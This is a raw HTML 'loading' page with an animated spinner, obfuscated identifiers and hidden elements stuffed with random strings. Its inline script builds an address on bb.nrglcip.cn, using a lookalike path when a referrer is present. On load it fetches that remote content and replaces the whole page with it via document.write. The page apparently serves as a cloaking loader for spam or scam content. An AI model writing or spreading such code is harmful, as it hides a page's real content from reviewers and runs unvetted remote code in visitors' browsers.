<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Lf0u7gumTw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Lf0u7gumTw .lgK3hl29 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Lf0u7gumTw .content {
            line-height: 50px;
            text-align: center
        }

        .Lf0u7gumTw .img {
            width: 100%
        }

        .Lf0u7gumTw .yFs741B {
            text-align: center
        }

        .Lf0u7gumTw .yFs741B span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Lf0u7gumTw .yFs741B span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Lf0u7gumTw .yFs741B span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Lf0u7gumTw .yFs741B span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Lf0u7gumTw .yFs741B span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Lf0u7gumTw .yFs741B span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Lf0u7gumTw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function GfGueb8puvA0d(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var eaS5kmK = GfGueb8puvA0d('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ eaS5kmK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ eaS5kmK +".html?a=share";
		}
		
        pdpLFHyA0=url+"#"+new Date().getTime();
        pdpLFHyA0 && function() {
            $.get(pdpLFHyA0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>p31tLbbb6XNlUs8eh7il</a>
<a  href='#' style='display:none'>p31tLbbb6XNlUs8eh7il</a>
<a  href='#' style='display:none'>p31tLbbb6XNlUs8eh7il</a>
<div style='display:none'>ouzCLxa1qI20wJS3c4Bm</div>
<span style='display:none'>n0OmdNMw58lqOJRiXTw3hOqQtHk1sOKSHhP1ShMP4uYwFBvDKnaBWsF4lmRFH2csuJBk4SF4ZjbdZKAfhxhDqVC</span>
<li style='display:none' >n6eiDDovR3i</li><div class="Lf0u7gumTw">
    <div class="lgK3hl29">
        <div class="yFs741B">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<p  style='display:none'>wqTMdOTkH8r7B9QWlakqWwJDpaZkFIYUynFq4gY</p>
<a  href='#' style='display:none'>CxOFecCXNJlr3DAk4fTGU29szpv8GkVIw8d8G52kx1tLiIy2Dmiw5o4cg48NFaPLv3H3LQ48ljytc64lpb83</a></body>
</html>